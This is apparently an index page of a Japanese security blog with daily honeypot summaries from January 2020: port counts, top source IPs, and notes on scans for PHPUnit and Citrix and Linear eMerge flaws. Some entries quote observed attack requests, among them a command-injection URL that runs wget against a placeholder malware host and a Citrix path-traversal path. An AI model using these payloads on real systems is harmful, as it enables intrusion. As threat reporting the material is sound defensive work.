【ハニーポット簡易分析】Honeypot簡易分析(2020/1/22)

Honeypot簡易分析(2020/1/22)となります。 <Honeytrap>Local Port Top 10LocalPort Count1433 405054 件445 559 件3389 154 件3391 129 件52869 76 件8888 49 件9000 45 件8883 45 件Remote IP Top 10RemoteIP Count103[.]78[.]215[.]58 29895 件222[.]174[.]122[.]170 </honeytrap>…

2020-01-22

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/21)

国内IPからPHPUnitのスキャン行為を大量に検知していました。IP: 52[.]156[.]59[.]22 <Honeytrap>Local Port Top 10LocalPort Count1433 101161 件445 142 件20547 71 件3389 68 件3391 45 件8081 29 件52869 24 件8080 13 件Remote IP Top 10RemoteIP Count104[.]143[.</honeytrap>…

2020-01-21

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/20)

Citrix製品の脆弱性CVE-2019-19781ですが、WOWHoneypotのmrrules.xmlでレスポンスをきちんと定義してあげると攻撃を観測できました。mrrules.xmlに以下を追加し、art配下にCitrix_smb_conf.txtを追加しています。-----mrrules.xmlの追加分------- <mrr> <meta> <mrrid>20001</mrrid> <enable>Tr</enable></meta></mrr>…

2020-01-21

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/19)

Honeypot簡易分析(2020/1/19)となります。Linear eMerge E3 シリーズの脆弱性を狙った攻撃を検知していました。/card_scan_decoder[.]php?No=30&door=wgethxxp://malwareurl <Honeytrap>Local Port Top 10LocalPort Count1433 426909 件445 1200 件3389 926 件139 559 </honeytrap>…

2020-01-20

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/18)

ポート80番にもCitrix ADC/Citrix Gatewayの脆弱性を狙った通信が来てました。/vpn/[.][.]/vpns/cfg/smb[.]conf <Honeytrap>Local Port Top 10LocalPort Count1433 426909 件445 1200 件3389 926 件139 559 件3391 172 件81 55 件52869 50 件27017 43 件 Remote IP Top </honeytrap>…

2020-01-18

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/17)

Honeypot簡易分析(2020/1/17)となります。 Citrix の脆弱性を狙ったスキャン攻撃はHTTPSの方にちょくちょく検知しています。また、WOWHoneypotのPathの集計にターゲットにしている製品情報を追加するようにしています。/vpn/[.][.]/vpns/ Target:Citrix ADC/…

2020-01-17

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/16)

Honeypot簡易分析(2020/1/16)の簡易分析となります。 PHPUnitのスキャン行為を検知していました。 <Honeytrap> Local Port Top 10 LocalPort Count 1433 481373 件 445 10878 件 3389 610 件 8080 175 件 5432 112 件 52869 83 件 139 65 件 81 62 件 Remote IP Top 10 </honeytrap>…

2020-01-16

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/15)

これまでの投稿していた分析に日付がずれていました。以下、簡易分析となります。 Honeypot簡易分析(2020/1/15) <Honeytrap> Local Port Top 10 LocalPort Count 1433 258482 件 3389 813 件 445 447 件 8443 192 件 2628 76 件 10134 50 件 139 47 件 81 43 件 Remote </honeytrap>…

2020-01-15

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/14)

2020/1/14の簡易分析となります。 <Honeytrap> Local Port Top 10 ペイロードがあるものに限定 LocalPort Count 1433 436677 件 445 639 件 3389 85 件 52869 56 件 81 51 件 139 47 件 8080 43 件 83 41 件 Remote IP Top 10 RemoteIP Count 91[.]211[.]107[.]184 2985</honeytrap>…

2020-01-14

【ハニーポット簡易分析】Honeypot簡易分析(2020/1/13)

Honeypot簡易分析(2020/1/13)の簡易分析となります。本日は特に変わった通信はありませんでした。 <Honeytrap> Local Port Top 10※ペイロードに文字列が含まれているものを集計 1433 263923 件 445 543 件 8080 148 件 5555 143 件 3389 76 件 81 53 件 139 45 件 5286</honeytrap>…

2020-01-13

【ハニーポット簡易分析】Honeytrap簡易分析(2020/1/12)

2020/1/12の簡易分析となります。ポート 1433の通信が多く、マルウェアはMirai亜種が多かったイメージです。いくつかのマルウェアダウンロード先は既にダウンしているものもありました。 <Honeytrap> Local Port Top 10 LocalPort Count 1433 228478 件 445 396 件 333</honeytrap>…

2020-01-12

【ハニーポット簡易分析】Honeypot簡易分析(2020/01/11)

2020/01/11 の簡易分析となります。今回は、Microsoft SQL Serverで利用されているポート1433宛への通信が増加していました。Honeypot簡易分析<Honeytrap> Local Port Top 10 LocalPort Count 1433 133228 件 445 214 件 3333 125 件 3389 68 件 6443 42 件 161 38 件 5</honeytrap>…